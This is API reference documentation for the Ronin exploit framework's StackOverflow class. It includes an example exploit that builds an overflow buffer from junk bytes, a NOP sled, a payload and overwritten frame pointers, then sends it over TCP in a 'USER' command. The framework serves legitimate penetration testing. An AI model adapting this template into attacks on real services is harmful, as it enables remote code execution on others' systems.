Class: Ronin::Exploits::StackOverflow

Inherits:
MemoryCorruption
Includes:
Mixins::StackOverflow
Defined in:
lib/ronin/exploits/stack_overflow.rb

Overview

Represents a stack overflow exploit.

Example

require 'ronin/exploits/stack_overflow'
require 'ronin/exploits/mixins/remote_tcp'

module Ronin
  module Exploits
    class MyExploit < StackOverflow

      register 'my_exploit'

      include Mixins::RemoteTCP

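      def build
        # Values written over the saved base pointer and saved
        # instruction pointer (return address) of the target stack frame.
        ebp = 0x06eb9090
        eip = 0x1001ae86

        @buffer = buffer_overflow(length: 1024, nops: 16, payload: payload, bp: ebp, ip: eip)
      end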

      def launch
        tcp_send "USER #{@buffer}"
      end

    end
  end
end

If you want more control over how the buffer is constructed:

def build
  ebp = 0x06eb9090
  eip = 0x1001ae86

  @buffer = junk(1024) + nops(16) + payload + stack_frame(ebp,eip)
end

Since:

  • 1.0.0

Constant Summary

Constants included from Mixins::NOPS

Mixins::NOPS::NOPS

Class Method Summary

Methods included from Mixins::StackOverflow

#buffer_overflow, #stack_frame

Methods included from Mixins::Text

#junk

Methods included from Mixins::NOPS

#nop, #nops, #perform_validate

Methods included from Mixins::Binary

#pack, #perform_validate, #platform

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from Exploit

#NotVulnerable, #Unknown, #Vulnerable, advisories, advisory, #build, #cleanup, disclosed?, disclosure_date, exploit, #exploit, #fail, #initialize, #launch, #perform_build, #perform_cleanup, #perform_launch, #perform_test, #perform_validate, quality, register, release_date, released?, software, software_versions, #test, #validate

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Class Method Details

.exploit_type ⇒ Symbol

This method is part of a private API. You should avoid using this method if possible, as it may be removed or be changed in the future.

Note:

This is used internally to map an exploit class to a printable type.

Returns the type or kind of exploit.

Returns:

  • (Symbol)

Since:

  • 1.0.0



# File 'lib/ronin/exploits/stack_overflow.rb', line 85

def self.exploit_type
  :stack_overflow
end